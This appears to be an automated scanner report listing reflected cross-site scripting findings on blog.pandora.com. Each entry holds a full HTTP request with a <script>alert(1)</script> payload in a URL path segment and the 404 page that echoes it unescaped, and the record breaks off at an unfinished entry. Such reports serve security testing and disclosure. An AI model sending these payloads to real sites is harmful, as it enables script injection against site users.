HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorabdac6<script>alert(1)</script>af1c2098b93/archives/2010/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2a0b4<script>alert(1)</script>fcd5b5c5573 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives2a0b4<script>alert(1)</script>fcd5b5c5573/2010/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives2a0b4<script>alert(1)</script>fcd5b5c5573/2010/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb68a<script>alert(1)</script>703abccb638 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010bb68a<script>alert(1)</script>703abccb638/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010bb68a<script>alert(1)</script>703abccb638/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8e5b4<script>alert(1)</script>6e5ab5102c8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/128e5b4<script>alert(1)</script>6e5ab5102c8/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/128e5b4<script>alert(1)</script>6e5ab5102c8/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bc67e<script>alert(1)</script>34ab249b04a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorabc67e<script>alert(1)</script>34ab249b04a/archives/2010/12/holiday-music.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorabc67e<script>alert(1)</script>34ab249b04a/archives/2010/12/holiday-music.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9cc4e<script>alert(1)</script>4b764c67cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives9cc4e<script>alert(1)</script>4b764c67cc/2010/12/holiday-music.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 366
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives9cc4e<script>alert(1)</script>4b764c67cc/2010/12/holiday-music.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bd53e<script>alert(1)</script>7f56f5a8144 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010bd53e<script>alert(1)</script>7f56f5a8144/12/holiday-music.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010bd53e<script>alert(1)</script>7f56f5a8144/12/holiday-music.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 84903<script>alert(1)</script>e925b373d1b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/1284903<script>alert(1)</script>e925b373d1b/holiday-music.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/1284903<script>alert(1)</script>e925b373d1b/holiday-music.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e86cc<script>alert(1)</script>2286b5dabd7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/12/holiday-music.htmle86cc<script>alert(1)</script>2286b5dabd7 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/12/holiday-music.htmle86cc<script>alert(1)</script>2286b5dabd7 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5d3cd<script>alert(1)</script>a8a76e357fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora5d3cd<script>alert(1)</script>a8a76e357fe/archives/2010/12/themed-stations.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora5d3cd<script>alert(1)</script>a8a76e357fe/archives/2010/12/themed-stations.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25283<script>alert(1)</script>32ad766d12b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives25283<script>alert(1)</script>32ad766d12b/2010/12/themed-stations.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives25283<script>alert(1)</script>32ad766d12b/2010/12/themed-stations.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ac8ae<script>alert(1)</script>07d5f78715a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010ac8ae<script>alert(1)</script>07d5f78715a/12/themed-stations.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010ac8ae<script>alert(1)</script>07d5f78715a/12/themed-stations.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f003<script>alert(1)</script>c2c8f4a2ec0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/126f003<script>alert(1)</script>c2c8f4a2ec0/themed-stations.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/126f003<script>alert(1)</script>c2c8f4a2ec0/themed-stations.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c1b2a<script>alert(1)</script>283fea933c9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/12/themed-stations.htmlc1b2a<script>alert(1)</script>283fea933c9 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/12/themed-stations.htmlc1b2a<script>alert(1)</script>283fea933c9 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ed28<script>alert(1)</script>2b8c9060753 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2ed28<script>alert(1)</script>2b8c9060753/archives/arizona/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:44 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2ed28<script>alert(1)</script>2b8c9060753/archives/arizona/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43add<script>alert(1)</script>997001f8093 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives43add<script>alert(1)</script>997001f8093/arizona/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives43add<script>alert(1)</script>997001f8093/arizona/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f01a6<script>alert(1)</script>b621b2a3f06 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/arizonaf01a6<script>alert(1)</script>b621b2a3f06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:49 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/arizonaf01a6<script>alert(1)</script>b621b2a3f06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 70767<script>alert(1)</script>cc798d55c4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora70767<script>alert(1)</script>cc798d55c4c/archives/california/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora70767<script>alert(1)</script>cc798d55c4c/archives/california/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d529c<script>alert(1)</script>b54dc99c7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesd529c<script>alert(1)</script>b54dc99c7a/california/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesd529c<script>alert(1)</script>b54dc99c7a/california/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7d9cb<script>alert(1)</script>1d67bc84c6b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/california7d9cb<script>alert(1)</script>1d67bc84c6b/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 352 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/california7d9cb<script>alert(1)</script>1d67bc84c6b/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 31f0f<script>alert(1)</script>5b0b1194bdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
